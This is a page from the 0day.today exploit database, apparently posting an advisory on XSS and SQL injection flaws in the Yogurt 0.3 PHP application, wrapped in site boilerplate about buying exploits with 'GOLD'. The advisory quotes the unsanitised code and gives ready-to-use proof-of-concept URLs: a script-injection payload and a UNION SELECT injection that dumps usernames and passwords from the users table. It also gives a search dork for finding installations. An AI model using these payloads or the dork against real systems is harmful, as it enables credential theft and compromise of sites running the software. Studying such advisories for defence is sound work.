0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities
============================================================== Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities ============================================================== -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Name : Yogurt Site : http://sourceforge.net/projects/yogurt/ Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459 Dork : "Yogurt build" -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Found By : br0ly Made in : Brasil -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Description: Bug : XSS In index.php: index.php:45: if(isset($_GET['msg'])) index.php:48: print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL BUG : SQL INJECTION system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul system/writemessage.php:82: or bug("Database error, please try again"); system/writemessage.php:83: $row = mysql_fetch_array($rs); In neither case was the method _GET filtered properly. Others .phps also contains the failures I'm posting the first one I found .. ^^ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- P0c: XSS : http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script> First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli. SQLi : http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users-- OBS: need register_globals=on; -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # 0day.today [2024-11-15] #